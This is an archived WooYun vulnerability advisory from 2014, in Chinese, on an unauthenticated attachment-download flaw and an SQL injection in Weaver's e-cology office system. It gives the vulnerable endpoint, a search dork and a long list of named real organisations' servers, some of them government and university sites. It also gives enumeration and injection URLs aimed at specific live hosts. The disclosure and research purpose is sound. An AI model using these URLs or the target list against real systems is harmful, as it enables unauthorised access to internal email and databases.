泛微某系统通用型SQL注入(无需登录) | wooyun-2014-076418| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076418

漏洞标题：泛微某系统通用型SQL注入(无需登录)

漏洞作者： Coody

提交时间：2014-09-18 16:00

修复时间：2014-12-17 16:02

公开时间：2014-12-17 16:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-09-18：细节已通知厂商并且等待厂商处理中
2014-09-23：厂商已经确认，细节仅向厂商公开
2014-09-26：细节向第三方安全合作伙伴开放
2014-11-17：细节向核心白帽子及相关领域专家公开
2014-11-27：细节向普通白帽子公开
2014-12-07：细节向实习白帽子公开
2014-12-17：细节向公众公开

简要描述：

无需登录直接注入...全版本通杀...
来个首页 :P

详细说明：

名称：e-cology 泛微协同商务系统
百度dork：泛微协同商务系统
测试发现，该商务系统邮件附件下载处存在：
①未授权访问漏洞（无需登录即可遍历下载内部邮件附件）
②SQL注入漏洞
问题链接：http://www.target.com//weaver/weaver.email.FileDownloadLocation?fileid=附件ID&download=1
收集的部分案例：
http://gl.triolion.com/
http://zmoa.warom.com:801/
http://www.yzjoa.com/
http://oa.nws.gov.cn/
http://www.cweme.net/
http://cyoa.warom.com:803/
http://220.248.243.186:8081/
http://sys.cdc.zj.cn/
http://cygf.warom.com:805/
http://oa.cncie.com/
http://oa.uuzz.com/
http://oa.hnnc.net:82/
http://oa.yangtzeu.edu.cn/
http://oaf.yitoa.com:6688/
… More …

0x01: 未授权访问
说明：访问问题链接，显示为空白页；遍历附件ID值，如存在附件可直接下载导致内部信息泄露。该漏洞不是重点，SO 简单带过就 OK。
http://220.248.243.186:8081/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1
http://220.248.243.186:8081/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1
-------------- 以上两个链接说明可以遍历下载内部附件 --------------
------------------- 以下链接说明未授权访问漏洞 -------------------
http://zmoa.warom.com:801/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1
http://www.yzjoa.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1
http://www.cweme.net/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1
http://cyoa.warom.com:803/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1
http://sys.cdc.zj.cn/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1
http://cygf.warom.com:805/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1
http://oa.cncie.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1
http://oa.uuzz.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1
……

0x02: SQL注入漏洞
说明：这里给出5个例子说明其通用型；遇到的数据库管理系统为 Oracle、MSSQL（sa权限）。
问题参数：fileid
a）http://oaf.yitoa.com:6688/weaver/weaver.email.FileDownloadLocation?fileid=1201*&download=1








系统版本：





b）http://oa.nws.gov.cn/weaver/weaver.email.FileDownloadLocation?fileid=32*&download=1










系统版本：





c）http://oa.hnnc.net:82/weaver/weaver.email.FileDownloadLocation?fileid=32*&download=1










系统版本：





d）http://220.248.243.186:8081/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1










e）http://gl.triolion.com/weaver/weaver.email.FileDownloadLocation?fileid=39*&download=1